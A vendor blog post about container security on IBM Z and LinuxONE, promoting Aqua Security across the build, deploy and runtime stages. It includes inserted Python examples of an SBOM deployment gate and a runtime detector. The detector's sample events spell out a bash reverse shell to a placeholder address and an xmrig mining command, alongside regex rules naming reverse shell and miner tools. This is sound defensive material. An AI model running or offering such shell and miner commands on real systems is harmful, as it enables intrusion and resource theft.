Securing Containerized Applications on IBM Z and IBM LinuxONE

By Maya Hirsh posted Mon April 21, 2025 05:31 AM

One of the key use cases driving mainframe modernization is running workloads built as containers, the building blocks of modern, cloud-native applications, on the mainframe. IBM has met this need by bringing Red Hat OpenShift, its container orchestration platform, to the IBM Z and IBM LinuxONE (s390x) architecture.

Containers offer a standardized way of building, packaging and managing applications across multiple platforms and clouds. They are highly portable, automatically orchestrated, and offer resilience and scalability. The benefits of using containers are many: modern applications are architected as microservices, which allows for both elasticity and scale, as well as independent, continuous updates of loosely coupled services. This enables organizations to innovate at a rapid pace, meet customer expectations faster, quickly adapt to changing requirements, and compete effectively in a demanding market.

For organizations that have invested in mainframe infrastructure, running containers on mainframes is a great way to extend it beyond traditional uses, capitalize on the investment, and provide seamless quality of service even in the most high-performance, large-scale environments.

And for teams that already use containers as a vehicle for developing and deploying applications, the ability to choose whether to run them on public cloud infrastructure, on x86-based virtualized private clouds, or on high-performance IBM LinuxONE means greater flexibility and a better cost-to-performance ratio, all while keeping the exact same continuous integration and deployment (CI/CD) processes, methods, and technologies.

OpenShift Container Platform on Z (OCPz)

Red Hat OpenShift is the leading Kubernetes-based container platform. It enables organizations to build, deploy and orchestrate applications packaged as container images in the OCI (Open Container Initiative) image format, which run on any Linux or Windows host with a compatible container runtime, in any public or private cloud. One caveat practitioners should keep in mind: an OCI image is built for a specific CPU architecture, so images destined for IBM Z and LinuxONE must be built for s390x (or published as multi-architecture manifests that include an s390x variant) rather than simply pulled from an x86 registry. With OpenShift supported on IBM Z (OCPz), customers can run the same platform on high-performance mainframes.

IBM LinuxONE is available in pre-packaged configurations optimized for OCPz and different types of applications and workloads. This ensures that OpenShift is ready to work right out of the box, shortening time to value.

Protecting Containerized Applications

So what about security? Do containerized applications require specialized security tooling?

The short answer is yes. Container images are assembled largely from open-source components, and may therefore include code with known vulnerabilities, or even malware inserted through supply-chain attacks. Because images are rebuilt frequently, each new version must be examined closely. And since new vulnerabilities in open source are disclosed continually, an image built from components that were "clean" at build time can become vulnerable afterwards without having changed at all.

When containers are deployed and running, they are orchestrated and managed automatically: started and stopped, replicated for scale, and refreshed from updated images. The same container could run on one node (server) one minute and on several others later on. There is no permanent IP address at which a given container can be found, so traditional network controls keyed to fixed addresses are ineffective.

The orchestration platform – in our case the Kubernetes-based OpenShift Container Platform – is also susceptible to misuse and manipulation by both attackers and insiders.

All of the above means that traditional solutions used in application security to protect servers and production environments fall short of providing adequate security controls for containers. They cannot handle the flow of code updates, the ephemeral nature of containers, the lack of permanence of network connections, and the full context of container processes running in a Linux environment.

The approach to securing containers must cover the full lifecycle of the container, that is, the build, deploy and run stages:

1. In development, the full SBOM (Software Bill of Materials) of each container image is analyzed and scanned for security issues: vulnerabilities, secrets, malware, and configuration issues that violate best practice (for example, a container that runs as root). These are risks that should be minimized, and security teams should have full visibility into what is flowing into their production environment, as well as the ability to drive remediation.

2. In deployment, the data collected in development is used to set thresholds that an image must meet to be deployed, and the infrastructure the containers are deployed into is assessed, at both the orchestration and the operating-system level.

3. Finally, at runtime the container workloads must be monitored to ensure they are not being exploited, and so that actions that form part of an attack sequence, such as privilege escalation, lateral movement across the network, data exfiltration, and the running of unapproved executables and malware, are detected and handled. Most of these activities can only be detected and intercepted by an agent on the individual nodes (hosts); they cannot be detected or stopped from the network or via the platform's APIs.
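The first two stages, as an added worked example (this is not Aqua's, Red Hat's or IBM's code): a small Python gate that joins a constructed CycloneDX-style SBOM with a constructed vulnerability feed, checks the image's OCI configuration for the root-user and baked-in-secret problems mentioned above, and applies deployment thresholds. The SBOM, the two image configurations, the vulnerability IDs (EXAMPLE-0001, EXAMPLE-0002), the package URLs and the Policy fields are all assumptions made for this example. The second feed represents a later scan of the same unchanged image, after a new disclosure, which is the "vulnerable after the fact" case from the text.

```python
"""Added example: build-time scan plus deploy-time gate for a container image.
Not Aqua's, Red Hat's or IBM's code; all inputs are constructed for illustration."""
import re
from dataclasses import dataclass, field

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

# Constructed CycloneDX-style SBOM: only the package URLs (purls) matter here.
SBOM = {
    "components": [
        {"purl": "pkg:rpm/libexample@1.0.0"},
        {"purl": "pkg:pypi/examplelib@4.2.0"},
    ]
}

# Constructed vulnerability feeds for two scan dates. EXAMPLE-0002 is
# "disclosed" between them, so the same unchanged image fails on day 2.
FEED_DAY1 = {
    "pkg:pypi/examplelib@4.2.0": [{"id": "EXAMPLE-0001", "severity": "medium"}],
}
FEED_DAY2 = {
    "pkg:pypi/examplelib@4.2.0": [{"id": "EXAMPLE-0001", "severity": "medium"}],
    "pkg:rpm/libexample@1.0.0": [{"id": "EXAMPLE-0002", "severity": "critical"}],
}

# Constructed OCI image configs (the "config" object as `skopeo inspect --config`
# shows it). An empty User means the runtime starts the process as uid 0; a
# credential in Env ships to everyone who can pull the image.
WEAK_CONFIG = {
    "architecture": "s390x",
    "config": {"User": "", "Env": ["PATH=/usr/bin", "DB_PASSWORD=hunter2-example"]},
}
HARDENED_CONFIG = {
    "architecture": "s390x",
    "config": {"User": "1001", "Env": ["PATH=/usr/bin"]},
}

SECRET_ENV = re.compile(r"(PASSWORD|SECRET|TOKEN|API_KEY)=", re.IGNORECASE)


@dataclass
class Policy:
    """Hypothetical deploy thresholds; the field names are assumptions of this example."""
    max_severity: str = "high"    # anything above this blocks deployment
    max_high_count: int = 3       # and so does more than this many highs
    allow_root: bool = False
    required_arch: str = "s390x"  # OCPz nodes cannot run amd64-only images


@dataclass
class Decision:
    allowed: bool
    findings: list = field(default_factory=list)


def scan(sbom, feed):
    """Build stage: join every SBOM component with the vulnerability feed."""
    return [
        {"purl": comp["purl"], **vuln}
        for comp in sbom["components"]
        for vuln in feed.get(comp["purl"], [])
    ]


def evaluate(sbom, feed, image_config, policy=None):
    """Deploy stage: apply thresholds to scan results and image configuration."""
    policy = policy or Policy()
    findings = []
    vulns = scan(sbom, feed)
    limit = SEVERITY_RANK[policy.max_severity]
    for v in vulns:
        if SEVERITY_RANK[v["severity"]] > limit:
            findings.append(f"{v['id']} ({v['severity']}) in {v['purl']} exceeds policy")
    highs = sum(1 for v in vulns if v["severity"] == "high")
    if highs > policy.max_high_count:
        findings.append(f"{highs} high-severity findings exceed limit {policy.max_high_count}")

    cfg = image_config.get("config", {})
    user = cfg.get("User", "").split(":")[0]
    if not policy.allow_root and user in ("", "root", "0"):
        findings.append("image runs as root (User unset or 0)")
    for entry in cfg.get("Env", []):
        if SECRET_ENV.search(entry):
            findings.append(f"possible secret baked into image env: {entry.split('=')[0]}")
    if image_config.get("architecture") != policy.required_arch:
        findings.append(f"image architecture is not {policy.required_arch}")
    return Decision(allowed=not findings, findings=findings)


if __name__ == "__main__":
    for label, cfg, feed in [("weak/day1", WEAK_CONFIG, FEED_DAY1),
                             ("hardened/day1", HARDENED_CONFIG, FEED_DAY1),
                             ("hardened/day2", HARDENED_CONFIG, FEED_DAY2)]:
        d = evaluate(SBOM, feed, cfg)
        print(label, "ALLOW" if d.allowed else "BLOCK", d.findings)
```

The point of keeping the SBOM and the feed separate is that the gate can be re-run against a fresh feed without rebuilding or re-scanning the image: the hardened image passes on day 1 and is blocked on day 2 by the new critical finding alone.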

Aqua Platform on IBM Z and LinuxONE

When deployed on IBM Z and IBM LinuxONE, Aqua Security enables customers to secure their containerized applications by managing vulnerabilities, reducing their attack surface, ensuring compliance with regulatory and security requirements, and providing real-time monitoring and defense for running applications.

Aqua scans container registries for vulnerabilities, exposed secrets, configuration issues and malware, ensuring applications pose minimal risk before deployment. Customers can set highly granular policies to control their risk threshold and initiate remediation and mitigation flows.

Around and after deployment, Aqua protects containers using its scanners and its purpose-built Enforcer agents, providing multiple layers of defense:

· Ensuring the integrity and compliance of container images before they are deployed, in registries and CI/CD pipelines, and blocking deployment if necessary

· Scanning OpenShift nodes for vulnerabilities, malware and misconfiguration in real time

· Monitoring the behavior of container workloads, detecting anomalies based on behavioral patterns of attack

· Preventing a host of common attack vectors, including in-memory execution, reverse shells, and crypto-mining attempts

· Providing options for automated responses to attacks, including real-time process blocking and malware removal
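The runtime behaviors listed above (privilege escalation, reverse shells, in-memory execution, crypto-mining, unapproved executables), as an added example that is not Aqua's Enforcer code and makes no claim about how Aqua implements them: a Python detector run over constructed process-exec events of the kind a node agent assembles from kernel data (for example via eBPF or the audit subsystem). The event schema (exe, args, uid, puid, in_image), the container names and the address 203.0.113.5 (from the TEST-NET-3 documentation range) are assumptions; the `/memfd:` prefix is what `/proc/<pid>/exe` shows for a binary executed from a memfd_create file descriptor, which is why fileless loaders are visible to a host agent but not on the network.

```python
"""Added example: runtime detection rules over process-exec events from a node
agent. Not Aqua's code; the events and their schema are constructed for illustration."""
import re
from dataclasses import dataclass

# Constructed events: one dict per exec() observed on a node. `in_image` is
# whether the binary exists in the image the container was started from
# (False => it was dropped in, or created, at runtime).
EVENTS = [
    {"container": "payments-api-7d9f", "uid": 1001, "puid": 1001,
     "exe": "/usr/bin/python3", "args": ["python3", "app.py"], "in_image": True},
    {"container": "payments-api-7d9f", "uid": 1001, "puid": 1001,
     "exe": "/bin/bash",
     "args": ["bash", "-c", "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"],
     "in_image": True},
    {"container": "payments-api-7d9f", "uid": 1001, "puid": 1001,
     "exe": "/memfd:stage2 (deleted)", "args": ["stage2"], "in_image": False},
    {"container": "batch-worker-2c1a", "uid": 1001, "puid": 1001,
     "exe": "/tmp/.x/xmrig",
     "args": ["xmrig", "-o", "stratum+tcp://pool.example:3333"], "in_image": False},
    {"container": "batch-worker-2c1a", "uid": 0, "puid": 1001,
     "exe": "/usr/bin/su", "args": ["su", "-"], "in_image": True},
]

REVERSE_SHELL = re.compile(r"/dev/(tcp|udp)/|\bnc\b.*\s-e\s|\bsocat\b.*\bexec:", re.IGNORECASE)
MINER = re.compile(r"stratum\+(tcp|ssl)://|\bxmrig\b|\bminerd\b", re.IGNORECASE)
FILELESS = re.compile(r"^(/memfd:|/dev/shm/|/proc/self/fd/)")
SHELLS = {"/bin/sh", "/bin/bash", "/usr/bin/sh", "/usr/bin/bash"}


@dataclass(frozen=True)
class Alert:
    container: str
    rule: str
    action: str  # "block" (kill the process) or "alert" (record and notify)


def detect(event):
    """Apply every rule to one exec event; returns the alerts it raises."""
    alerts = []
    cmdline = " ".join(event["args"])

    def hit(rule, action):
        alerts.append(Alert(event["container"], rule, action))

    if event["exe"] in SHELLS and REVERSE_SHELL.search(cmdline):
        hit("reverse-shell", "block")
    if FILELESS.match(event["exe"]):
        hit("in-memory-execution", "block")
    if MINER.search(cmdline):
        hit("crypto-mining", "block")
    if event["uid"] == 0 and event["puid"] != 0:
        # child gained root from a non-root parent (setuid binary, su, exploit)
        hit("privilege-escalation", "alert")
    if not event["in_image"]:
        # drift: the executable was not part of the scanned, approved image
        hit("unapproved-executable", "block")
    return alerts


def run(events):
    """Evaluate a stream of events; returns all alerts in order."""
    return [a for e in events for a in detect(e)]


if __name__ == "__main__":
    for a in run(EVENTS):
        print(f"{a.action.upper():5} {a.container:20} {a.rule}")
```

Two design points worth noting. The drift rule fires on the miner and the memfd payload even if the signature rules are evaded, because it compares against the image that was scanned and approved at deploy time rather than against a list of bad names; that link between the build stage and the runtime stage is what "full lifecycle" buys. And privilege escalation is left as an alert rather than a block here, since legitimate setuid transitions exist inside some images; a real policy would block or allow per container.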

Summary

With Aqua Security's full-lifecycle security for OCP on IBM Z and IBM LinuxONE, organizations can safely deploy and run containerized applications, enjoying the same comprehensive security controls in development and at runtime that they employ in other cloud environments, while benefiting from the performance, service levels, scale and cost-effectiveness of IBM Z and IBM LinuxONE.

[Learn more: https://hubs.li/Q03819jn0]

Author : Rani Osnat (https://www.linkedin.com/in/raniosnat/)
